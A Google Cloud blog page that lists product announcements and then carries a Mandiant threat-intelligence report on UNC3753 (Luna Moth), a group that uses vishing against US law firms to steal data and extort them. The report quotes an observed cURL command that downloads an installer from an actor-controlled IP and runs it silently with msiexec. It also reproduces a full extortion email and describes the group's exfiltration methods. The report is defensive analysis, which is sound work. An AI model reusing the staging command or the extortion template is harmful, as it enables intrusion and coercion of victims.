Cloud Blog

What’s new with Google Cloud

Fri, 05 Jun 2026 16:00:00 +0000

Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more.

Tip: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: Google Cloud blog 101: Full list of topics, links, and resources.


Jun 1 - Jun 5

Modeling the physical world with BigQuery Graph
Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this post, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.
Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)
Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.

Register for the June 18 Spanish Community TechTalk

May 25 - May 29

Anthropic’s Claude Opus 4.8 is now available on Gemini Enterprise Agent Platform. As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and track dependencies over extended sessions.
API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs
Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.

Register now
Securing AI Agents: The Extended Agent Gateway Pattern
Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.

Register for the June 4 Community TechTalk
API-to-Agent Security: Exposing REST APIs to Gemini Enterprise via MCP
Connect Gemini Enterprise agents to core data without creating security hazards. Join Google Cloud Specialist Nigel Walters on June 11 to learn how to instantly transform legacy REST APIs into secure Model Context Protocol (MCP) servers. We’ll cover how to safely register tools with Gemini while enforcing gateway-level guardrails like rate limiting and access control policies.

Register for the June 11 Community TechTalk

May 18 - May 22

Chinese Webinar | June 4: AI Command and Control
As AI agents move from experimental pilots to core enterprise functions, governance has become a critical next step. Join Google Cloud on June 4th at 10:00 AM (Beijing Time) to learn how to build a secure AI management layer architecture. We'll explore how to develop governed MCP (Model Context Protocol) endpoints, manage tool access to enterprise data, and leverage robust audit logs to operationalize AI. This session also includes a practical demonstration of these governance frameworks on Google Cloud.

Register here
GCP Announces New Features to Benchmark and Optimize LLMs for On-Device Use Cases
Deploying fine-tuned LLMs from GCP to edge devices like smartphones is complex due to fragmented hardware. Google AI Edge Portal bridges this gap, giving GCP developers the ability to test AI performance on 120+ Android devices, representing the full diversity of high, medium, and low tier smartphones on the market today. This week at I/O, we announced brand new capabilities to benchmark and debug LLM performance across these devices. Sign up to use these new features in private preview today.

May 11 - May 15

Build Your AI & MCP Control Tower for Universal Governance
Master the future of agentic security with Apigee. Join our Community TechTalk on May 21 to discover how Apigee serves as a central "Control Tower" for the Model Context Protocol (MCP). We will explore how new JSON-RPC tool authorization enables fine-grained access policies across your organization, ensuring secure and scalable AI deployments. Whether managing internal tools or external users, learn to govern your agentic ecosystem with absolute precision. This session is designed for global coverage across EMEA and AMER regions.

Register for the May 21 Community TechTalk

Apr 27 - May 1

Master Your Launch: The Apigee Production Go-Live Checklist
Ensure a secure launch with the Apigee production guide. Join Nicola Cardace on May 28 to explore security guardrails, including IAM roles, mTLS configurations, and encrypted KVM migrations. Scheduled at 11 AM EDT / 5 PM CEST to support EMEA and AMER teams, this TechTalk provides the technical roadmap you need to flip the switch with absolute confidence.

Register for the May 28 Community TechTalk
Transforming APIs into Governed Agentic Tools on the Google Cloud Agentic Platform
Turn your APIs into secure, governed agentic tools on the Google Cloud Agentic Platform. Join Specialist Christophe Lalevée on May 7 for a technical deep dive into AI productization. Scheduled at 5 PM CEST / 11 AM EDT to maximize coverage for developers across EMEA and AMER, this session explores the integration and governance frameworks required to scale enterprise-ready AI with confidence.

Register for the May 7 Community TechTalk
Fractional G4 VMs are Generally Available, providing a highly efficient and cost-effective entry point for AI and graphics workloads. These new configurations, using NVIDIA virtual GPU (vGPU) technology, allow you to leverage the power of the NVIDIA RTX PRO 6000 Blackwell Server Edition GPUs in flexible, smaller increments, so you can right-size your infrastructure to match the specific demands of your applications. By providing more granular access to advanced hardware, fractional G4 VMs let you optimize resource allocation and reduce overhead without sacrificing performance. You can now select from additional GPU slice sizes for your specific needs:
- 1/2 GPU: Ideal for more intensive tasks such as LLM inference, robotics sensor simulation, and high-fidelity 3D rendering.
- 1/4 GPU: Optimized for mainstream workloads, including mid-range creative design, video transcoding, and real-time data visualization.
- 1/8 GPU: Great for lightweight applications such as remote desktops, productivity tools, and entry-level streaming services.
Transitioning AI from a sandbox prototype to an enterprise-grade system is a major hurdle. A monolithic script won't suffice for widespread deployment. To achieve true scale and reliability with Gemini, organizations must adopt service-oriented micro-agent architectures, establish Zero-Trust security, and implement rigorous EvalOps. Master the "Agentic Maturity Ladder" to ensure your AI & Agentic solutions are robust, secure, and ready for the real world.

Watch the deep dive and read the developer blog to learn more.
ML Development in VS Code with Google Cloud Power: Workbench Extension Now Available
Data scientists and developers can now combine the local productivity of VS Code with the scalable infrastructure of Google Cloud. The new Google Cloud Workbench Notebooks extension allows you to connect to and run notebooks on managed cloud environments directly within your local IDE. This integration streamlines the ML lifecycle by eliminating context switching and providing high-performance compute for complex workloads in a familiar interface. As part of our commitment to the developer ecosystem, the extension is fully open-sourced to support community-driven innovation.
- Install from Marketplace: GoogleCloudTools.workbench-notebooks
- Contribute on GitHub: colab-enterprise-vscode

Apr 20 - Apr 24

Announcing the 2026 Google Cloud Partners of the Year
Google Cloud is honored to celebrate the winners of the 2026 Partner of the Year awards! These awards recognize an exceptional group of partners across AI, Security, Infrastructure, and more, who have demonstrated a commitment to customer success. From global system integrators to specialized startups, these winners are leveraging the power of Google Cloud to solve complex challenges and drive digital transformation worldwide. Join us in congratulating these organizations for their innovation, collaboration, and impactful results over the past year.

See the 2026 Partner Award winners

Apr 13 - Apr 17

We're excited to announce the Public Preview of Datastream’s metadata integration with Knowledge Catalog. This is the first step in our vision to provide a centralized, "single pane of glass" for all Datastream assets. The enhancement automatically synchronizes Streams, Connection Profiles, and Private Connections, eliminating data silos. It enhances discoverability, allowing you to search for Datastream assets using the same interface as BigQuery tables. Centralized governance is also provided, making your real-time data estate more transparent and easier to manage.
Upgrading Apigee OPDK to 4.53 with OS Modernization
Modernize your infrastructure using Google’s official, sequential upgrade path. Our technical expert Rakesh Talanki outlines how to upgrade Apigee OPDK to v4.53 while migrating to a supported OS (RHEL 8.x/9.x). This guide covers the "build-out" methodology, including multi-data center syncing, to ensure a stable, zero-downtime transition.

Read the guide
Cloud Run Worker Pools and CREMA: Powering Serverless AI at Scale
Google Cloud has announced the General Availability of Cloud Run worker pools, a new resource type designed specifically for pull-based, non-HTTP workloads. Unlike traditional Cloud Run services that scale based on request traffic, worker pools provide an "always-on" environment for background tasks like processing message queues or running large-scale AI inference. To support this, Google Cloud also open-sourced the Cloud Run External Metrics Autoscaler (CREMA). Built on KEDA, CREMA enables queue-aware autoscaling for worker pools, allowing them to dynamically scale based on external signals like Pub/Sub backlog or Kafka lag.
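To make the idea of queue-aware autoscaling concrete, here is a minimal Python sketch of the general technique: size the worker count in proportion to the backlog, then clamp it to configured bounds. This is not CREMA's actual algorithm or configuration format. The function name, parameters, and default limits are hypothetical and chosen only for illustration.

```python
import math


def desired_workers(backlog: int, target_per_worker: int,
                    min_workers: int = 0, max_workers: int = 10) -> int:
    """Return a worker count proportional to queue backlog, clamped to bounds.

    All names and defaults here are illustrative assumptions, not CREMA settings.
    """
    if target_per_worker <= 0:
        raise ValueError("target_per_worker must be positive")
    # One worker per `target_per_worker` outstanding messages, rounded up.
    wanted = math.ceil(backlog / target_per_worker)
    return max(min_workers, min(max_workers, wanted))


if __name__ == "__main__":
    # Example backlogs, such as a Pub/Sub backlog or Kafka lag reading.
    for backlog in (0, 250, 5000):
        print(backlog, desired_workers(backlog, target_per_worker=100))
```

With a target of 100 messages per worker, an empty queue scales to the minimum, a backlog of 250 asks for three workers, and a very large backlog is capped at the maximum.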
Apigee Model Context Protocol (MCP) now Generally Available
Expose enterprise APIs as MCP tools for agentic AI applications with the General Availability of MCP in Apigee. This update allows developers to transform APIs into AI-ready tools using OpenAPI Specifications, removing the need for local MCP servers or additional infrastructure. With managed endpoints and semantic search in API hub, you can now provide AI agents with secure, governed access to enterprise data at scale.

Explore the MCP overview

Apr 6 - Apr 10

Community TechTalk: Powering Retail Agents with ADK, UCP & Apigee X
Move beyond basic chatbots to secure, transactional AI experiences. Join our Community TechTalk on April 16 to learn how Apigee X and Gemini build a "Trust Layer" for AI shopping assistants using UCP standards. We’ll demonstrate how to block prompt injections with Model Armor and implement cost governance via token limits to secure the path from discovery to purchase.

Register for the TechTalk
Implement multimodal capabilities in your AI agents
Explore three new reference architectures for building sophisticated multi-agent AI systems that can process and analyze multimodal data. To analyze disparate multimodal data and produce a high-confidence classification, see Classify multimodal data. To create a fluid conversational AI that processes audio and video streams in real time, see Enable live bidirectional multimodal streaming. To consolidate fragmented multimodal data into a searchable knowledge graph, see Multimodal GraphRAG resource orchestration.
Automate SecOps workflows with an agentic AI system
To accelerate incident response and reduce manual toil for your security team, you need a system that can automate remediation playbooks. Our new reference architecture helps you build an AI agent that orchestrates complex triage and investigation workflows across disparate security tools, such as SIEM, CSPM, and EDR, from a single interface. See the full guide to orchestrate security operations workflows.

Mar 30 - Apr 3

ASEAN Webinar | April 30: Mastering Agentic Governance at Scale with GCP
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud experts Shilpi Puri & Wely Lau for a webinar on April 30th at 11:00 AM SGT to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.

Mar 23 - Mar 27

Turn your API sprawl into an agent-ready catalog
As organizations scale, APIs often become scattered across multiple gateways, creating "blind spots" that hinder AI adoption. To solve this, we’ve introduced two new capabilities for Apigee API hub: a new integration with API Gateway to automatically centralize API metadata into a single control plane, and a specification boost add-on (now in public preview). This add-on uses AI to enhance your API documentation with the precise examples and error codes that AI agents need to function reliably.

Read the full blog post to get started.
Webinar | April 16: AI Command & Control
As AI agents move from experimental pilots to core enterprise functions, governance is the critical next step. Join Google Cloud expert Satyam Maloo for a webinar on April 16th at 11:00 AM IST to learn how to architect a secure AI Management layer. We’ll explore developing governed MCP endpoints, managing tool access to enterprise data, and operationalizing AI with robust audit logs. The session includes a live demo of these frameworks in action on Google Cloud.

RSVP here.
Modernizing and Decoupling Event Ingestion with Apigee
In modern cloud-native architectures, decoupling producers from consumers is critical for building resilient systems. While Google Cloud Pub/Sub provides a scalable backbone, exposing it directly to external clients can introduce security and management overhead. This new guide explores how to leverage Apigee as an intelligent HTTP ingestion point. Learn how to handle security, mediation, and traffic control before messages reach your internal bus using the PublishMessage policy or Pub/Sub API.

Read the full guide.

Mar 16 - Mar 20

Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades
The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.

Explore the full range of what the assistant can do.

Mar 9 - Mar 13

Want to use Gemini to develop code and don't know where to start?
This article walks through a couple of examples of developing code with Gemini prompts, including the changes that were needed to get the code working. It also points to other examples that are available on GitHub.

Mar 2 - Mar 6

Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model. Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.

Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via Vertex AI and developers via the Gemini API in Google AI Studio.
TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee
Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.

Register for the TechTalk
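The polling step mentioned above can be sketched in a few lines of Python. Under RFC 8628, the device repeatedly asks the token endpoint for a token, keeps waiting on `authorization_pending`, and lengthens its polling interval by 5 seconds on `slow_down`. The sketch below is not Apigee-specific: `poll_for_token` and its `request_token` callback are hypothetical names, and the callback stands in for the real HTTP call so the example runs without a network.

```python
import time
from typing import Callable, Dict


def poll_for_token(request_token: Callable[[], Dict[str, str]],
                   interval: float = 5.0,
                   expires_in: float = 600.0,
                   sleep: Callable[[float], None] = time.sleep) -> Dict[str, str]:
    """Poll until the user approves, denies, or the device code expires.

    `request_token` is a hypothetical callback that performs one token
    request and returns the decoded JSON response as a dict.
    """
    waited = 0.0
    while waited < expires_in:
        sleep(interval)
        waited += interval
        response = request_token()
        error = response.get("error")
        if error is None:
            return response          # success: response carries the token
        if error == "authorization_pending":
            continue                 # user has not finished approving yet
        if error == "slow_down":
            interval += 5            # RFC 8628: add 5 seconds to the interval
            continue
        # access_denied, expired_token, or any other error ends the flow.
        raise RuntimeError(f"device authorization failed: {error}")
    raise TimeoutError("device code expired before the user approved")


if __name__ == "__main__":
    # Simulated server responses instead of a real token endpoint.
    fake = iter([{"error": "authorization_pending"}, {"access_token": "demo"}])
    print(poll_for_token(lambda: next(fake), sleep=lambda s: None))
```

Injecting `sleep` keeps the loop testable. A real client would also use the `interval` and `expires_in` values returned by the device authorization response rather than fixed defaults.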

Feb 23 - Feb 27

Pro-level image generation gets faster and more accessible with Nano Banana 2
Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model here.

The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud
Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.

By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy.

Learn more.
Stop typing, start interacting! The Gemini Live Agent Challenge is here. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!

Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at geminiliveagentchallenge.devpost.com

Feb 9 - Feb 13

Introducing Gemini 3.1 Pro on Google Cloud.
3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our goal to help you transform your business for the agentic future. Learn more about the model’s capabilities here. Gemini 3.1 Pro is available starting today in preview in Vertex AI and Gemini Enterprise. Developers can access the model in preview via the Gemini API in Google AI Studio, Android Studio, Google Antigravity, and Gemini CLI.
Automate Storage Compatibility with GKE Dynamic Default Storage Classes
Managing storage across mixed-generation VM clusters in GKE just got easier. With the new Dynamic Default Storage Class, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.

Explore automated disk type selection
Community TechTalk: AI-Powered Apigee Development with strofa.io
Join the Apigee community on February 26 for a deep dive into strofa.io. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.

Register now to reserve your spot.

Jan 26 - Jan 30

Simplify API Governance with Native OpenAPI v3 Support
Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.

Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.

Accelerate API Testing with the New Open Source API Tester
Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like proxy.basepath without leaving your terminal.

Explore the API Tester guide and start testing your proxies today.
Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid
Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via kubectl, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.

Implement Kubernetes Secrets in your hybrid proxies.
See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud
Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings -> Appearance menu.

Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!
Apigee X Networking: PSC or VPC Peering?
Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.

Watch the video.

Jan 19 - Jan 23

Bridge the Gap: Excel-to-API Conversion in Apigee Portals
Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.

Learn how to build it.
Elevate your applications with Firestore’s new advanced query engine
We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.

Learn more about Firestore pipeline operations.

Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms

Fri, 05 Jun 2026 14:00:00 +0000

Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan

Introduction

From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," “Chatty Spider,” and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States.

UNC3753 leverages voice phishing (vishing) and social engineering techniques to achieve remote access into corporate environments. Using pretexts such as data migration or invoice-related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records for subsequent extortion demands.

Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. In these physical incidents, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media.

This blog post details the threat group's technical lifecycle across recent Mandiant Consulting incident response engagements, highlights tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure.

Threat Detail

The UNC3753 campaign lifecycle reflects an optimized, fast-tempo operational model. In many Mandiant-investigated incidents, the entire attack sequence, from initial target contact to data theft and extortion, occurred within a single business day. Recently, Mandiant observed data searches, staging, and theft initiated in under an hour.

The threat group frequently initiates campaigns using benign, invoice-themed email lures sent from actor-controlled consumer email accounts. These messages contain no active links or malicious attachments. Instead, they typically contain a brief, generic message, for example: “hello, here is the invcoie we talked about yesterday”. Google Threat Intelligence Group (GTIG) assesses that the primary purpose of these emails is to establish a pretext, raising the target's internal security concerns so they are more susceptible to follow-up voice calls.

Figure 1: UNC3753 attack lifecycle

Initial Access via IT Helpdesk Impersonation

The core of UNC3753's entry mechanism relies on targeted vishing. Mandiant has observed the group targeting personnel across all seniority levels. These employees are often publicly listed on the organization’s website, which lets the threat actors harvest phone numbers and email addresses. Acting as members of the organization's internal IT helpdesk or security team, threat actors place direct calls to these employees.

The callers use a variety of verbal instructions to guide target behavior. Under the guise of addressing a security issue or aiding with a corporate data migration project, they build trust and direct the target to join a screen-sharing session.

Remote Screen Control and Legitimate Tool Abuse

Once the target is engaged, the threat actors bypass conventional automated boundary security and email filtering controls by instructing the user to download and execute screen-sharing applications.

Screen-Sharing Utilities

UNC3753 instructs targets to initiate remote desktop and support sessions using built-in or commercial services, including Zoom, Microsoft Terminal Services, Microsoft Teams, and Quick Assist. During a Teams-facilitated intrusion, the threat actor held five distinct calls with the same target over a three-day period.

Commercial RMM Agents

UNC3753 frequently attempts to establish more persistent access by social engineering targets into downloading AnyDesk, Bomgar, or Zoho Assist installers. In one engagement, the threat actor attempted to install a "SuperOps RMM agent" by convincing the target to download and execute a payload via a cURL command.

Message Delivery via Privnote

Threat actors consistently utilize privnote[.]com, a web-based, self-destructing text utility, to transmit installation links and commands to targets. This evasion technique ensures that copy-paste vectors leave no permanent footprint on endpoint browsers or chat logs.

Example cURL command staging string observed in UNC3753 remote sessions:

curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet
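For defenders, a command line of this shape can be looked for in process-creation telemetry. The Python sketch below is an illustration only, not vetted detection content from Mandiant: the regular expressions and the function name `looks_like_silent_rmm_install` are assumptions made for this example. It flags a single command line that combines a cURL download to a file with a quiet `msiexec` install.

```python
import re

# Illustrative patterns only. Real detections need tuning and testing
# against your own telemetry.
CURL_DOWNLOAD = re.compile(
    r"\bcurl(?:\.exe)?\b[^&|]*\s(?:-[a-zA-Z]*o|--output)\s", re.IGNORECASE
)
SILENT_MSI = re.compile(
    r"\bmsiexec(?:\.exe)?\b[^&|]*\s/i\b[^&|]*\s/(?:quiet|qn)\b", re.IGNORECASE
)


def looks_like_silent_rmm_install(command_line: str) -> bool:
    """Return True if one command line downloads with curl and quietly runs msiexec."""
    return bool(
        CURL_DOWNLOAD.search(command_line) and SILENT_MSI.search(command_line)
    )


if __name__ == "__main__":
    sample = ('curl -sL "http://[actor-controlled-ip]/installer" '
              '-o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet')
    print(looks_like_silent_rmm_install(sample))
```

A heuristic like this is easy to evade by splitting the commands or renaming binaries, so it is best treated as one signal among several.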

Infrastructure Pivoting and Local Staging

Intrusions have abused Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. In separate Mandiant Consulting cases, UNC3753 established Zoom sessions directly on targets' personal BYOD endpoints. Using these compromised personal laptops, they accessed corporate virtual desktop infrastructure (VDI) using native client platforms, such as Windows 365 (Windows365.exe) or Citrix clients.

Once VDI environment access is secured, the threat actors pivot to corporate file systems:

System Enumeration: The threat actors map local directories, enumerate active OneDrive folders, and crawl mapped network drives.
Document Management Targeted Harvesting: Threat actors target specific legal and document storage repositories.
Keyword Search and File Staging: Threat actors use specific keyword search functions within iManage to locate highly sensitive folders containing tax logs (Forms W-2, W-9, and 1099), audit files, corporate client agreements, and Social Security numbers (SSNs). Staged results are compiled and sorted within target-accessible subdirectories, primarily inside the user's Downloads folder or native Roaming profile path.

Data Theft

UNC3753 exfiltrates the staged data using a variety of methods to bypass security controls. They frequently use portable versions of WinSCP or Rclone. In other instances, they simply log into a threat actor-controlled consumer file sharing account directly within the victim's web browser and batch upload the stolen files.

Cloud Storage Staging: Threat actors instruct targets—or directly control their screens—to drag and drop staged folders into threat actor-controlled consumer file sharing accounts. In several intrusions, the exfiltration destination included folders explicitly renamed to mimic the victim organization's branding.
FTP Utilities: When browser-based uploads are restricted by endpoint controls, threat actors download FTP and SFTP client binaries, primarily WinSCP, to exfiltrate bulk packages. In one incident, the threat group exfiltrated 1.7 gigabytes of data from a target's local OneDrive folder to a Google Drive account before pivoting to a VDI session and exfiltrating an additional 14.4 gigabytes using WinSCP. Google has taken action against this actor by disabling the Drive accounts and assets associated with this activity.
Email Forwarding: The threat actors have also had victims stage files from internal iManage repositories and instructed them to send the files to threat actor-controlled consumer email addresses from the target's mailbox.

Threat Actor Extortion Tactics

The threat cluster delivers unbranded extortion communications via email shortly after successfully stealing data, often within 30 minutes of exiting the target environment.

These highly aggressive extortion letters give organizations a three-day deadline to respond and initiate ransom negotiations. If the victim organization is unresponsive, the threat actors declare they will call and email target employees and external clients directly to alert them of the data breach. The extortion letters explicitly emphasize that the leak will compromise client trust and invite substantial regulatory fines, and they suggest that external clients could sue the victim organization for data mishandling. Additionally, in a follow-on message, the group has threatened to publish all exfiltrated archives on the LEAKEDDATA data leak site (DLS).

Sample Extortion Email

Subject: [Victim Name] has lost confidential data of their clients. Very Important!

Hello,

We have to inform you that we got access to the [Victim Name] corporation's database and took a very large dataset. We have been in your network for weeks in multiple systems , aiming for proprietary and confidential files, and were able to obtain what We were looking for as well as the data of many clients. <mentions the general nature of the stolen documents>. This is not a joke or a scam.

This is a real problem that puts the existence of your firm in danger and to prove it We have attached screenshots that are confirming the possession of the files.

Reply to Our email and We will show you the complete file tree and actual files.

We are an elite group who's been in this business for a very long time, We have Our own website where We post the data and thousands of individuals follow Our work , and connections in different business social media. But, what's more important, is that We want to return your data peacefully and as soon as possible.

We will guarantee you the complete database deletion from Our servers, video evidence of us deleting the files, privacy of our communication and Our security advice with an explanation of how We got into your network and how to fix the vulnerability that We found.

In order for us to solve this problem you need to send us an email and start communicating with us. We hope to find a financial solution that will be acceptable for both parties.

In case of ignorance or no agreement, We will notify your employees, partners and customers, after which We will publish your data. You will receive claims from individuals, and legal entities for information leakage and breach of contracts, your current deals will be terminated. Journalists and others will dig into your documents, finding inconsistencies or violations in them. Your organization will lose its reputation, shares will fall in price, and your organization will be forced to close.

Let us remind you that your data can be used by many other hackers and criminals on the dark web as well as your competitors and enemies in case We leak the data.

Law enforcement will not help you, We are out of their jurisdiction, and We already took all the critical data. They will only tell you not to communicate with us and be the first ones to fine you.

As soon as you reach out, We will show you all the files that We obtained, so you can understand the seriousness of this problem and the necessity to proceed to the negotiations.

Our communication will stay 100% private before and after the agreement. We can show the proof of it as well.

All further communication can be done through this email address.

Do not waste any time as it is ticking . Text us today, so We don't have to start calling your employees tomorrow. You will have 3 days to start communicating.

Here We attached some screenshots confirming all the above. Respond to this email and We will send you the file tree.

Figure 2: UNC3753 extortion note example

Data Leak Site

Figure 3: LEAKEDDATA DLS (partially redacted; cropped)

Suspected UNC3753 Activity Involving Physical Access

While UNC3753 primarily relies on digital vectors, GTIG assesses that associated threat actors have also attempted direct data theft using physical, in-person access. This escalating tactic is corroborated by a recent FBI Cyber FLASH Alert highlighting instances where Silent Ransom Group threat actors leveraged physical office access to exfiltrate corporate data via removable USB media.

According to the FBI advisory, if remote social engineering attempts fail, actors will send an individual to a victim's physical location. The onsite threat actor will claim they need to image the device or create local backups to address a security issue. Once they gain access to the endpoint, they attempt to exfiltrate corporate data directly to an external drive.

Although limited forensic evidence and the absence of a subsequent extortion attempt prevent formal attribution, GTIG assesses that these physical intrusions are likely associated with UNC3753 based on structural, timeline, and targeting overlaps.

Attribution

GTIG attributes this campaign and related social engineering operations to UNC3753 based on infrastructure overlaps, domain registrar tracking, victimology, and target staging directories. UNC3753 (aliases: "Luna Moth," "Chatty Spider," and "Silent Ransom Group (SRG)") is a financially motivated threat cluster active since at least March 2022. UNC3753 has TTP overlaps with UNC2686, a threat cluster that conducted "Bazarcall" style campaigns dating to early 2021. UNC3753 deployed LOCKBIT.BLACK in 2022, but has since prioritized extortion-only data theft operations, typically involving threats to post stolen files to the LEAKEDDATA DLS. The threat cluster relies heavily on Remote Monitoring and Management (RMM) tools, unlike UNC2686, which deployed BAZARLOADER variants as well as TRICKBOT, URSNIF, and SILENTNIGHT. Initially, UNC3753 used subscription-themed billing email lures (such as fake software renewal alerts), typically with PDF attachments containing phone numbers for actor-controlled call centers. Beginning around March 2025, the cluster shifted tactics to pose as internal corporate IT helpdesk staff.

Remediation and Hardening

To mitigate the risk of voice phishing, physical office intrusions, and unauthorized endpoint control, GTIG recommends that organizations implement the following controls:

User Education

Conduct user awareness training specifically tailored to UNC3753 tactics, techniques, and procedures.

Physical Access and Verification Policies

